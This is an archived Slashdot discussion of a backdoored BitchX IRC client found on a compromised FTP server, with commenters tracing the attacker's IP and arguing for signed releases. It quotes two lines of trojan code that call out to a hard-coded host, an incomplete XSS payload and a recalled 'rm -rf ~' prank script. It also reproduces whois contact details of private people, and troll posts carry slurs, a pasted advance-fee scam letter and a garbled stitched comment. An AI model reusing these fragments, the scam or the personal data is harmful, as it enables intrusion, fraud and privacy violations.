×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

cancel ×
This is a preview of your comment

No Comment Title Entered

Anonymous Coward 1 minute ago

No Comment Entered

338 comments

FP! (-1)

govtcheez (524087) | more than 11 years ago | (#3806922)

I claim this first post in the name of Yoko Ono! May she die a fiery, horrible death!

Re:FP! (-1)

Adolf Hitroll (562418) | more than 11 years ago | (#3806925)

who's that ?
sounds like "yogurt grunge" !

Re:FP! (-1, Troll)

sinserve (455889) | more than 11 years ago | (#3806982)

That is the chick who used to fuck John Lenon, the first beatle to bite the dust.

Re:FP! (-1)

Adolf Hitroll (562418) | more than 11 years ago | (#3807019)

lenon... bite... lemon...
sounds like some chicanos aperitive, to me...

so, there's a girl that fucked a hippie that bit the dust like freddie mercury ?

was it because of him, btw ?

Holy shit balls! (-1, Flamebait)

Anonymous Coward | more than 11 years ago | (#3806930)

a /. story about a backdoor not related to MS! I HAVE SEEN IT ALL!

haha (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#3806931)

Thats a bitch

In other news ... (4, Funny)

NASAKnight (588155) | more than 11 years ago | (#3806938)

Local inmates confirmed that there was a problem with people entering into BitchX's backdoor. The suspect is a large man calling himself 'big mamma.'

Re:In other news ... (-1, Troll)

Anonymous Coward | more than 11 years ago | (#3807175)

BitchX - "We have a larger backdoor than goatse"

Fist "Bitch takes it up the back door" Post (-1, Troll)

Anonymous Coward | more than 11 years ago | (#3806940)

Well it had

to

be done...

...

XSS in Slashcode (-1, Offtopic)

dave-fu (86011) | more than 11 years ago | (#3806941)

There is a nasty Cross Site Scripting(XSS) vuln in
Slashcode. This was used a day or so go on
slashdot.org and resulted in most of the site being
taken down for an hour or so. The maintainers of
slashcode have patched the problem in CVS but have not
even mentioned it anywhere that I can find. This
leaves all sites using slash vulnerable to this
exploit.

An example exploit (incomplete) is as follows:



I am dissapointed that the slachcode maintainers have
silently fixed this on slashdot.org yet made no
mention of the problem elsewhere so that other sites
can patch themselves. No wonder there are so many
"trolls" on slashdot.org...ah well.

If you run a site using slashcode, get the latest CVS.

That is all. Move along.

Re:XSS in Slashcode (-1)

neal n bob (531011) | more than 11 years ago | (#3806963)

those worthless fags can barely run a site, what do they care about securing other slash pages.

BTW - that exploit was possibly the best in slashbot history. I was proud to be a crapflooder that day.

Re:XSS in Slashcode (4, Interesting)

Jester998 (156179) | more than 11 years ago | (#3807000)

Hey... nice "copy and paste" from the BugTraq posting...
----- BEGIN BugTraq POST -----

Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsu bscribe: <mailto:bugtraq-unsubscribe@securityfocus.com&g t;
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Deli vered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31935 invoked from network); 2 Jul 2002 08:55:04 -0000
Message-ID: <20020702085626.305.qmail@web21002.mail.yahoo.c om>
Date: Tue, 2 Jul 2002 01:56:26 -0700 (PDT)
From: gcsb <gcsbnz@yahoo.com>
Subject: XSS in Slashcode
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-UIDL: "[K!!WR\"!nkN"!NSF"!

There is a nasty Cross Site Scripting(XSS) vuln in
Slashcode. This was used a day or so go on
slashdot.org and resulted in most of the site being
taken down for an hour or so. The maintainers of
slashcode have patched the problem in CVS but have not
even mentioned it anywhere that I can find. This
leaves all sites using slash vulnerable to this
exploit.

An example exploit (incomplete) is as follows:

<p &gt; onMouseOver..insert javascript here...>

I am dissapointed that the slachcode maintainers have
silently fixed this on slashdot.org yet made no
mention of the problem elsewhere so that other sites
can patch themselves. No wonder there are so many
"trolls" on slashdot.org...ah well.

If you run a site using slashcode, get the latest CVS.

That is all. Move along.

________________________________________________ __
Do You Yahoo!?
Sign up for SBC Yahoo! Dial - First Month Free
http://sbc.yahoo.com

----- END BugTraq POSTING -----

You didn't even reformat the exploit code so that it showed up properly... sheesh.

- Jester

Re:XSS in Slashcode (4, Informative)

jamie (78724) | more than 11 years ago | (#3807153)

This post is quite inaccurate and we will be responding, also on bugtraq, momentarily. The author of the post did not contact the Slash development team, or we could have corrected some of his misconceptions.

Re:XSS in Slashcode (3, Insightful)

Pave Low (566880) | more than 11 years ago | (#3807033)

Interesting how there's a fairly serious bug in slashcode that was exploited yesterday but they don't publicize that. At least they fixed it quickly, but if you guys like to point out other peoples bugs, how about shining the light on yourself once in awhile? I'm sure other slashcode sites would have liked to have known about it.

IRC (-1)

Adolf Hitroll (562418) | more than 11 years ago | (#3806946)

IRC is just another form of parasitism.
there's nothing as boring than chat, I think if you have some time to lose, you'd better jerk off, at least you won't eat the bandwidth.
so yeah, who fscking cares about chat kiddies impersonating l33t h4x0rs i order to get some goatse pr0n ?
better go on slashdot... well... before Y2K.

The name.... (3, Interesting)

wowbagger (69688) | more than 11 years ago | (#3806947)

Am I the only one who felt a qualm about using this package because of the name?

BitchX - "I 0NZ0R J00, B1TCH!"

Re:The name.... (3, Informative)

RealisticWeb.com (557454) | more than 11 years ago | (#3806993)

Your not alone by far. My computer (yes even my Linux box) is a family computer, and I refuse to use any software with names or content that is not appropriate for my children to see. Keep in mind that what is "appropriate" is totaly my opinion, and some people would argue with me, but my quesition is: why is this only ever an issue with open source software?

Re:The name.... (-1)

neal n bob (531011) | more than 11 years ago | (#3807011)

the answer to your question is that most of the open sores freaks are inspired by japanese tentacle porn; many of them are also known pedophiles. If they spent more time in real life and less whacking it to sailor moon or hello kitty then they would have normal names for their programs.

Re:The name.... (3, Insightful)

dalassa (204012) | more than 11 years ago | (#3807028)

Because most companies have marketing people to hit them on the head and say no, this is not appropiate.

Re:The name.... (1)

Lion-O (81320) | more than 11 years ago | (#3807034)

but my quesition is: why is this only ever an issue with open source software?

Because the people programming it don't have to worry about market sales and/or popularity ratings?

Re:The name.... (1)

jpc (33615) | more than 11 years ago | (#3807054)

Unfortunately, at least in this part of the world, mingetty really is rather rude if you parse it right (ie wrong). And it is rather widespread in Linux distros.

It is of course true that the less appropriate words havent been trademarked yet, so they are available for open source projects.

How long... (0)

rmezzari (245108) | more than 11 years ago | (#3806957)

Will it take to find such backdoor if this software was closed-source?

That's one of the best arguments pro-open-source IMHO.

Re:How long... (0)

Anonymous Coward | more than 11 years ago | (#3807014)

Oh man. You are either a huge troll or a karma whore. I am not sure which. When a Microsoft bug is discovered you probably post how that would never happen in Open-Source.

Re:How long... (3, Insightful)

Anonymous Coward | more than 11 years ago | (#3807027)

About 5 seconds into install, when the closed-source firewall running on the closed-source OS catches the closed-source IRC client trying to create the reverse telnet connection.

Most interesting... (5, Interesting)

phreak404 (241139) | more than 11 years ago | (#3806961)

Is that when the vulnerability was first submitted they also submitted some interesting finds about the ftp server on BitchX.com serving trojaned and clean versions, depending on the originating IP, demonstrating that the server had been 0wned (more than likely).

Sad that the developers didn't notice sooner, and it makes you wonder how many boxes have now additionally been 0wned because of this.

Re:Most interesting... (-1)

neal n bob (531011) | more than 11 years ago | (#3806992)

typical of open sores developers - since it is well known that most open sores people are GNU/terrorists. It is likely they intended this to allow them to attack the US computer infrastructure. Thankfully most wise companies here have resisted the insecure, terror minded open sores software infiltration.

SENATOR BENSON OGBEBOR (-1)

trollercoaster (250101) | more than 11 years ago | (#3806962)

My name is SENATOR BENSON OGBEBOR, the executive chairman Pension funds
committee in the senate of the federal Republic Of Nigeria. I am
writing you to earnestly
Solicit for your assistance in helping to
receive some sum of money.I got your e-mail address on the Internet
while searching for a
reliable and reputable person to handle this transaction.

THE PREPOSITION:
We have the sum of US$15,000,000.00 (Fifteen Million Dollars) that we
intend to transfer
overseas through the assistance of a foreign partner.This money came as
a result of the
unclaimed pension funds over the years due to the over invoiced claim
put forward by my
committee but the pensioners have already been paid for their claim.
What is left is the over
invoice amount of US$15,000,000.00 which has been deposited in a Bank.

I have agreed to transfer the funds overseas for my
campaign funding and also invest part of this money in any viable
business in your country
under your care.

I am contacting you therefore, to stand in as the beneficiary to
process this fund into your
custody. I will provide you with 25% for assisting us and 5% for
expenses.

The fund shall be transferred to you legally in
accordance to all laid down procedures governing transfer of funds. I
have perfected all
modalities for the successful transfer of this money to you as the
beneficiary. Finally, I have to reassure you that this transaction is
risk free and should be
kept absolutely
confidential.

Presently, you can reach me by return mail, you should
also include your telephone, fax and or phone numbers, for secured
communication
between us.

Thank you for your anticipated cooperation.

I await your response.

SENATOR BENSON OGBEBOR

Who's this? (5, Informative)

Draoi (99421) | more than 11 years ago | (#3806966)

There's an interesting IP address hard-coded into the trojaned code;

+ sa.sin_port = htons (6667);
+ sa.sin_addr.s_addr = inet_addr ("213.77.115.17"); alarm (10);
Doing a reverse-DNS lookup gives;
;; QUERY SECTION:
;; 17.115.77.213.in-addr.arpa, type = ANY, class = IN

;; ANSWER SECTION:
17.115.77.213.in-addr.arpa. 1H IN PTR wenus.dtcomsa.com.
.... so who are they??

Re:Who's this? (2)

larien (5608) | more than 11 years ago | (#3806981)

Probably the owners of another rooted box...

Re:Who's this? (2)

Draoi (99421) | more than 11 years ago | (#3807029)

True. At least it's a start - shutdown whatever's collecting data on port 6667 on the 0wn3d box & it'll stop the snoop ....

Re:Who's this? (4, Informative)

zdzichu (100333) | more than 11 years ago | (#3807001)

inetnum 213.77.115.0 - 213.77.115.255
netname DATACOM
descr Datacom
descr Warszawa Bemowo
country PL
admin-c AW7760-RIPE
tech-c RW7118-RIPE
status ASSIGNED PA
mnt-by AS5617-MNT
changed tkielb@cst.tpsa.pl 20000915
source RIPE

(stupidly formatted because of lamefilter)

Re:Who's this? (0, Redundant)

jhampson (580482) | more than 11 years ago | (#3807013)

Ack! is the .pl the domain for Palestine? The Feds are right, we ARE being cyber-attacked!

Re:Who's this? (0, Flamebait)

Ilgaz (86384) | more than 11 years ago | (#3807025)

.pl=Poland
.pk=Palestine (err, imagining dozens of arab terrorists in front of some *nix boxes makes me laugh)

Re:Who's this? (1)

Ilgaz (86384) | more than 11 years ago | (#3807044)

Whats that with that p* domain..? eek, .pk is Pakistan. Sorry

Re:Who's this? (1)

hyperstation (185147) | more than 11 years ago | (#3807146)

god, palestine is .ps you jackasses...i think we all need to look at the ccTLD list [slashdot.org] again.

Re:Who's this? (0)

Anonymous Coward | more than 11 years ago | (#3807031)

It's Poland (oh surprise, hackers from East Europe), not Palestine... the Palestinians don't even have a recognized state (yet at least) and of course don't have their own domain.

Re:Who's this? (5, Informative)

Neil Watson (60859) | more than 11 years ago | (#3807038)

PL is Poland.

[nwatson@valetta ~]$whois 213.77.115.17
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyri ght.html

inetnum: 213.77.115.0 - 213.77.115.255
netname: DATACOM
descr: Datacom
descr: Warszawa Bemowo
country: PL
admin-c: AW7760-RIPE
tech-c: RW7118-RIPE
status: ASSIGNED PA
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

route: 213.77.0.0/16
descr: TPNET (PL)
descr: Provider Local Registry
origin: AS5617
notify: konradpl@zt.piotrkow.tpsa.pl
mnt-by: AS5617-MNT
changed: konradpl@zt.piotrkow.tpsa.pl 20000728
source: RIPE

person: Arkadiusz Wrobel
address: "DataCOM" S. A.
address: ul Radiowa 21a m20
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 298639
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: AW7760-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

person: Rafal Wrzosek
address: "DataCOM" S. A.
address: ul Kaliskiego 11a /312
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 145187
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: RW7118-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

Yes, someone has most likely compromised the box and is using it for the backdoor. However, the owners of the box are still responsible for the lack of security that allowed their box to be compromised.

Re:Who's this? (0, Troll)

Basje (26968) | more than 11 years ago | (#3807152)

However, the owners of the box are still responsible for the lack of security that allowed their box to be compromised.

I disagree. That would be equivalent to saying you are responsible for your house being burglared. Not having (adequate) security makes one a likely target. It does not, however, make you responsible.

They are, of course, responsible for anything they do. Giving out backdoored software might get them in trouble, if they actively sent the software it to people. If people downloaded it, they may be liable. However, not many countries have as "modern" laws as the USofA, I do not think that is a problem in Poland.

Re:Who's this? (1, Informative)

Anonymous Coward | more than 11 years ago | (#3807008)

It's hardly likely to be the owners of that machine that wrote the backdoor. That IP is likely to be somebody elses machine that's been compromised and used by the backdoor creators.

Re:Who's this? (0, Redundant)

Ark42 (522144) | more than 11 years ago | (#3807020)

According to http://www.iana.org/assignments/ipv4-address-space Its a RIPE IP, and according to http://www.ripe.net/perl/whois/

inetnum: 213.77.115.0 - 213.77.115.255
netname: DATACOM
descr: Datacom
descr: Warszawa Bemowo
country: PL
admin-c: AW7760-RIPE
tech-c: RW7118-RIPE
status: ASSIGNED PA
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

route: 213.77.0.0/16
descr: TPNET (PL)
descr: Provider Local Registry
origin: AS5617
notify: konradpl@zt.piotrkow.tpsa.pl
mnt-by: AS5617-MNT
changed: konradpl@zt.piotrkow.tpsa.pl 20000728
source: RIPE

person: Arkadiusz Wrobel
address: "DataCOM" S. A.
address: ul Radiowa 21a m20
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 298639
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: AW7760-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

person: Rafal Wrzosek
address: "DataCOM" S. A.
address: ul Kaliskiego 11a /312
address: 01 - 485 Warszawa
address: POLAND
phone: +48 606 145187
fax-no: +48 22 6672495
e-mail: awrobel@wat.waw.pl
nic-hdl: RW7118-RIPE
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

Re:Who's this? (0, Redundant)

andyr (78903) | more than 11 years ago | (#3807024)

% See http://www.ripe.net/ripencc/pub-services/db/copyri ght.html

inetnum: 213.77.115.0 - 213.77.115.255
descr: Datacom
descr: Warszawa Bemowo
country: PL
admin-c: AW7760-RIPE
tech-c: RW7118-RIPE
status: ASSIGNED PA
mnt-by: AS5617-MNT
changed: tkielb@cst.tpsa.pl 20000915
source: RIPE

Re:Who's this? (1)

bokketies (584972) | more than 11 years ago | (#3807118)

so who are they??

After careful investigation which involved numourous traceroutes and pings I can now conclude this isn't a group of persons. So you're wrong there, it's not a "they" but a "she".

She is a bitch.

Does anyone still use Pirch ? (1, Offtopic)

cOdEgUru (181536) | more than 11 years ago | (#3806968)

When I first started using irc clients, mirc and Pirch were my first two clients. I understand mirc is one of the most widely used clients, but what about Pirch ? Does anyone stil use it.

Re:Does anyone still use Pirch ? (1)

Ilgaz (86384) | more than 11 years ago | (#3807074)

Sad, its gone for good... I liked it too! If you want a Pirch like IRC client for win32 box, you probably have heard of x-chat of *nix, now it has unoffical win32 port hosted on its offical website ( http://www.xchat.org )

Re:Does anyone still use Pirch ? (1)

cetan (61150) | more than 11 years ago | (#3807178)

Heh, I've still got it installed but I shell for IRC and use irssi. It's there if I need it but I've not touched it in ages.

It's Odd (3, Interesting)

Copperhead (187748) | more than 11 years ago | (#3806969)

According to the bugtraq post, when you downloaded the file, sometimes you received the backdoored version, and other times you didn't.

From the post, "There is something very strange going on with the FTP server on ftp.bitchx.org. In some cases, it serves up the trojaned version; in others, the original, safe version. It seems to be client / client-behavior based (we're not sure exactly what)."

The post continues, "To add a little more to this; we've confirmed that if you come off of what appears to be a cablemodem/dsl IP you are likely to get a trojan'd copy. If you come off of a more static link, you are likely to get a clean copy."

Very strange.

Re:It's Odd (2)

dattaway (3088) | more than 11 years ago | (#3807043)

I'm on a cablemodem and I tried getting the trojaned version hours after this was discovered. Apparently, the ftp server was fixed as I tried from multiple IP addresses and ways... Fortunately, I happened to have the tarball that I compiled from and the md5sum matched the good version.

Moral of the story: *always* check md5sums, or use a packaging system that always checks it for you. Doesn't rpm automatically do this? Gentoo's portage does.

Re:It's Odd (1)

Quietust (205670) | more than 11 years ago | (#3807066)

What I'd like to know about MD5 sums is what prevents the h4x0r from updating the MD5 sum on the FTP server to match the trojan'd download.

Unless the MD5s stored up there are also digitally signed (i.e. PGP/GPG/etc.), which would be rather redundant (since it'd be easier to just sign the archive itself).

Re:It's Odd (2)

ceswiedler (165311) | more than 11 years ago | (#3807077)

If the ftp server was rooted, why couldn't they just replace the md5 sums? Usually I see them as files in the same directory as the tarballs. How hard is it to generate an md5 sum which matches the hacked version?

Re:It's Odd (3, Insightful)

mindstrm (20013) | more than 11 years ago | (#3807086)

Well, perhaps they wanted to spread it to dumb home users but not to anyone more professional. Perhaps they wanted to go longer without being caught.

Perhaps it's actually a DNS issues, and it's directing some people to a dummy server.

Re:It's Odd (0)

Anonymous Coward | more than 11 years ago | (#3807045)

You added nothing whatsoever to the commentary except "Very Strange". Congrads on catching yet another moderator who doesn't read posts.

Re:It's Odd (1)

Ilgaz (86384) | more than 11 years ago | (#3807097)

Hmm... BX ftp DNS server hacked, so it rotates IP's to trojaned version carrying IP and real IP?

I am an end user but I guess its possible. Just like aol.com rotates ftp.netscape.com to different machines, there is a software for it.

terminology (1, Funny)

Anonymous Coward | more than 11 years ago | (#3806970)

Not only is this thing called "BitchX", but it also has a "backdoor". I'm not a vulgar person, but this is too much

ah, the good ol' days (5, Funny)

MattW (97290) | more than 11 years ago | (#3806972)

This reminds me of the good old days, when people distributed like 20 different scripts for the irc2 client, all of which had some backdoor or another. Most of them listened for ctcp commands and would pass them directly to shell. CTCP GROK JUPE CMD ORD -- bonus points to anyone who can name all 4 scripts that had those backdoor commands. Then there were amusing tidbits like scripts that would flood anyone using the authors nick without the right hostmask. Then there was the 'Folder's Crystals' script -- it set your display to off, so you saw nothing even while you joined a channel and were saying, "I've just had all my files secretly replaced by folgers_crystals... let's see what happens!" (meanwhile, the script was executing rm -rf ~).

Of course, back then, you could blame people for running something they didn't understand, since it was on the order of getting a whack-a-bill game by email and just running it, whereas tainted downloads aren't quite as shameful, but ah, it does bring back the memories of the Wild Days of irc...

Re:ah, the good ol' days (1)

kistel (585461) | more than 11 years ago | (#3807133)

Oh well, those were the days... Most of the ppl used unchecked scripts, which was like a habit or something (Phoenix by Vassago, etc.) The famous bot wars, op wars, splits and floodings ;-)

indeed (2)

MattW (97290) | more than 11 years ago | (#3807165)

Ah, yes. But the best was just colliding people, pre-TS. I wrote a script that made connection(s) to remote servers, usually far from you and your intended victim. If they changed nicks (which people often did to avoid being collided by a split off server rejoining their nick), the script would order the remote client to change nicks. Since the direct connection would propagate faster than the serverserverserver links (usually you'd pick a server 5+ hops away), by the time the nick change propagated there, it would cause a collision. Combine that with a traditional collide from a split server, and it was unavoidable. I remember taking #jews back from a bunch of nazis using that script.

Re:ah, the good ol' days (0)

Anonymous Coward | more than 11 years ago | (#3807190)

IRC wars cost universities big money and are the sole reason why IRC is turned off left and right. Funny how some people remember shitting in their own bed as "good ol' days".

Any text client do dccserver? (-1, Offtopic)

Anonymous Coward | more than 11 years ago | (#3806974)

I hate MIRC but want to use fservers behind firewalls. Anyone haeva client with the /dccserver command supported?

See, this is what's cool about OSS.. (3, Insightful)

XaXXon (202882) | more than 11 years ago | (#3806977)

If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

Anti-GPL people (read Microsoft and their lackies) may try and take this as a weakness in OSS, but I look at it as a strength. If one of their developers gets something like this into one of their products (either on his/her own or with the blessing of the company, the world may never know). With OSS, it's out in the open for everyone to see/fix.

Re:See, this is what's cool about OSS.. (5, Insightful)

toupsie (88295) | more than 11 years ago | (#3807042)

If BitchX was some sort of closed-source product, how long might this have taken to show up? Many eyes lock down all backdoors.

Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor, modify the FTP server and set up a bizarre distribution method (has anyone figured this out yet?). Granted many eyes helped find this problem, but in a closed source world, this wouldn't happen unless you had a disgruntled employee or a really stupid project manager. If BitchX were a commercial, closed source product, the exploit would most likely be a buffer overflow, not a blatant backdoor.

Disclaimer: I use a closed source IRC product called, Ircle [ircle.com].

Re:See, this is what's cool about OSS.. (2)

Shagg (99693) | more than 11 years ago | (#3807063)

Not to burst your bubble, but if BitchX was closed source, I doubt a third party would have access to the source code to inject the trojaned backdoor

I guess the only backdoors in MS software are the ones the developers put there ;)

Re:See, this is what's cool about OSS.. (2)

toupsie (88295) | more than 11 years ago | (#3807089)

I guess the only backdoors in MS software are the ones the developers put there ;)

Exactly! Check out this post [slashdot.org] in the same thread. I mentioned exactly this problem!!!

Re:See, this is what's cool about OSS.. (0)

Anonymous Coward | more than 11 years ago | (#3807069)

uhh
and how many months did it take to get noticed?

Re:See, this is what's cool about OSS.. (2)

jmegq (33169) | more than 11 years ago | (#3807076)

> With OSS, it's out in the open for everyone to see/fix.

Not really. [acm.org]

Re:See, this is what's cool about OSS.. (1)

vegetablespork (575101) | more than 11 years ago | (#3807168)

Reflections on Trusting Trust was also exactly what came to my mind when I read about the apparent ftp server compromise also.

<speculation mode=conspiracy tone=sardonic>Closed source vendors are planting trojans in open source code to create high profile incidents causing the general public to question its security and rely on safe, regularly patched Microsoft Palladium products</speculation>

Re:See, this is what's cool about OSS.. (1)

protonman (411526) | more than 11 years ago | (#3807179)

Ok. That does it. I'll modify my filters so I can read just the trolls. Hmm, this probably is a troll anyway.

tss... insightfull my ass...

Not as bad as the massive backdoor in Windows (1, Offtopic)

toupsie (88295) | more than 11 years ago | (#3806980)

As reported in The Register [theregister.co.uk]. Why worry about IRC when Microsoft 0w3n$ j00!...legally...24/7.

*BSD Is Dying (-1)

pwpbot (588025) | more than 11 years ago | (#3806983)

Netcraft has now confirmed BSD is dying Yet another crippling bombshell hit the beleaguered BSD community when recently IDC confirmed that BSD accounts for less than a fraction of 1 percent of all servers Coming on the heels of the latest Netcraftsurvey which plainly states that BSD has lost more market share this news serves to reinforce what weve known all along BSD is collapsing in complete disarray as further exemplified by failing dead last samagcom samagcom in the recent Sys Admin comprehensive networking testYou dont need to be a Kreskin amdestcom to predict BSDs future The hand writing is on the wall BSD faces a bleak future In fact there wont be any future at all for BSD because BSD is dying Things are looking very bad for BSD As many of us are already aware BSD continues to lose market share Red ink flows like a river of blood FreeBSD is the most endangered of them all having lost 93 of its core developersLets keep to the facts and look at the numbers OpenBSD leader Theo states that there are 7000 users of OpenBSD How many users of NetBSD are there Lets see The number of OpenBSD versus NetBSD posts on Usenet is roughly in ratio of 5 to 1 Therefore there are about 70005 1400 NetBSD users BSDOS posts on Usenet are about half of the volume of NetBSD posts Therefore there are about 700 users of BSDOS A recent article put FreeBSD at about 80 percent of the BSD market Therefore there are 700014007004 36400 FreeBSD users This is consistent with the number of FreeBSD Usenetposts Due to the troubles of Walnut Creek abysmal sales and so on FreeBSD went out of business and was taken over by BSDI who sell another troubled OS Now BSDI is also deadits corpse turned over to yet another charnel house All major surveys show that BSD has steadily declined in market share BSD is very sick and its long term survival prospects are very dim If BSD is to survive at all it will be among OS hobbyist dabblers BSD continues to decay Nothing short of a miracle could save it atthis point in time For all practical purposes BSD is dead BSD is dying

Please read the article... (1, Redundant)

Snard (61584) | more than 11 years ago | (#3806984)

The linked article gives a bit more insight into the REAL problem... It appears that someone has hacked the FTP server, and it is now serving up a trojan'ed copy of the aforementioned BitchX distribution, but only part of the time (based on the IP address and/or connectivity of the client). Rather sneaky...

Anyway, I guess this is a good reason to have some sort of "signing" on your distribution.

This may be an indication (2)

boa13 (548222) | more than 11 years ago | (#3806985)

... that Linux is gaining popularity among the crackers. This scenario is well known and has been explained for years. But it remained largelly theoretical until this year, it seems to me.

So, now we can expect people that mostly ignored us to come and crack our servers, install backdoors into our releases. They're probably going to write better viruses, too. I guess this is the price you pay when you become mainstream.

For years we've told the world how secure our OS was. Err, could be, once configured properly. The time has come, now, to do this.

trouble (0)

tps12 (105590) | more than 11 years ago | (#3807002)

Uh oh. Now hacksers are going to be able to access my valuable collection of smileys.

That can't be! (-1, Troll)

Anonymous Coward | more than 11 years ago | (#3807004)

Tell me it aint so. Something insecure in a Linux/Unix app?

My Redhat for dummies says this thing is secure!

Backdoor. (4, Interesting)

ldopa1 (465624) | more than 11 years ago | (#3807007)

Is this truly suprising? With the proliferation of "secret" functionality in everything from DVD's [dvdeastereggs.com] to Palm applications [palmlife.com], it seems that a lot of developers take great delight in doing something "on the sly" that will get them noticed.

While the vast majority of these "easter eggs" are completely harmless, it's only logical to assume that they present an opportunity for malicous activities. I mean, who among us doesn't have SOME "H4X0R" history? Doesn't it follow that some of that will come out when the opportunity to put in a "gift" presents itself?

Also, this seems to me to be one of the down sides of the Open Source fight. Most of the accomplished hackers that I know are strong advocates of Open Source. It leads me to believe that most of the proponents of Open Source are or were at some time at least a script kiddie with delusions of grandeur.

Nobody I know has the time to actually check every line of code in a 200 Meg build for one or two lines of backdoor code, especially when the application is DESIGNED to make and break connections.

Re:Backdoor. (2, Interesting)

numatrix (242325) | more than 11 years ago | (#3807056)

This was not the developers doing something sly. There have been a recent rash of compromised servers hosting different pieces of software, and then backdoors being configured in a similar manner in the ./configure script as described in this post. Similarly hit was monkey.org [monkey.org] where some of dug song's security tools were compromised. Google cache of dug's post [216.239.37.100].

There was another relatively famous piece of software compromised the same way recently as well. Somebody is going through some great lengths to put backdoors in the source of some good OSS. Makes you wonder how much is being missed.

Re:Backdoor. (1)

ldopa1 (465624) | more than 11 years ago | (#3807105)

Amen to that. I similarly wonder how many viruses are out that that nobody except the authors know about? Hundreds? Thousands?

Speaking of which, if there is a virus that exploits a backdoor (a la CodeRed) in a server, why can't you author a counter-virus? One that exploits the same back door, goes in, removes the virus and closes the backdoor? Then it waits, listening for other CodeRed viruses to attempt a breach, go to that compromised server and kill the virus there ad infinitum until there are no more requests for X cycles? Has anyone thought of this?

Re:Backdoor. (2)

Marx_Mrvelous (532372) | more than 11 years ago | (#3807145)

There are probably very few viruses that only the author knows about; the number of different viruses in the wild is actually very, very low.

And people have discussed using so-called "anti-viruses" but there are too many legal issues to deal with. If people just patch their boxes, problem solved.

Re:Backdoor. (0)

getter_85 (464748) | more than 11 years ago | (#3807208)

Someone has, but people don't like the idea of something going in and out of their box without knowing of it first.

Digitally sign your sources... (5, Informative)

Cyclops (1852) | more than 11 years ago | (#3807009)

Many don't digitally sign their sources with a secure key, and thus there is absolutely no way to verify that those sources are the ones the developer intended to release.

Many think that a simple md5sum alongside the sources is enough. IT IS NOT. Any attacker who replaces the sources can as easily replace the md5sum, which can be generated by anyone.

A digital signature (I suggest using gpg) can only be generated by YOU if you keep it in a secure place, and use it to sign the sources. The public side of this key should be widely distributed and preferably signed (that is recognized) by third parties... the most trustworthy these third parties can be, the better.

After the huge attack on the network where such sites as Apache were hosted, other Apache projects which did not sign their packages suddenly started signing them. They got scared. You should be too.

A lot of people instinctively trust their dns resolutions (oops) and also think that if they go to http://www.mozilla.org they will get their favorite browser for sure. They are also wrong. dns can be spoofed under certain conditions, so they could be going to crackersR.us instead, and downloading a neat trojaned source, for instance.

The more a project grows in fame, the more it will become a likely target for these kinds of attacks, so the more need to a degree of responsability that should not be needed, but it unfourtunately is since the danger is ubiquitous.

Be carefull, be very carefull.

Also avoid using user root period.

watch out! (0, Redundant)

Marque_Off (589454) | more than 11 years ago | (#3807015)

According to the bugtraq post, when you downloaded the file, sometimes you received the backdoored version, and other times you didn't. From the post, "There is something very strange going on with the FTP server on BitchX.com serving trojaned and clean versions, depending on the originating IP, demonstrating that the slachcode maintainers have silently fixed this on slashdot.org and resulted in most of the problem in CVS but have not even mentioned it anywhere that I can find. This leaves all sites using slash vulnerable to this exploit.

An example exploit (incomplete) is as follows: I am dissapointed that the server had been 0wned (more than likely). Sad that the developers didn't notice sooner, and it makes you wonder how many boxes have now additionally been 0wned (more than likely). Sad that the server had been 0wned (more than likely).

Will it take to find such backdoor if this software was closed-source? That's one of the site being taken down for an hour or so. The maintainers of slashcode have patched the problem in CVS but have not even mentioned it anywhere that I can find.

There is a nasty large man calling himself 'big mamma' vuln in Slashcode. This was used a day or so go on slashdot.org yet made no mention of the problem elsewhere so that other sites can patch themselves. Thats a bitch No wonder there are so many "trolls" on slashdot.org...ah well. If you come off of what appears to be client / client-behavior based (we're not sure exactly what)."

GNU/Linux needs signed downloads (5, Insightful)

splorf (569185) | more than 11 years ago | (#3807032)

I'm sorry but this is one thing Microsoft and/or Netscape did right. The practice of including detached PGP signatures on download sites is useless--they have to be manually verified, and hardly anyone bothers.

GNU/Linux downloads should be in signed archives like Netscape JAR files. JAR files are basically ZIP archives with a signature file stored inside the .zip in a standard place. When you unpack the archive, the unpacker checks the signature the same way a browser checks an SSL web site.

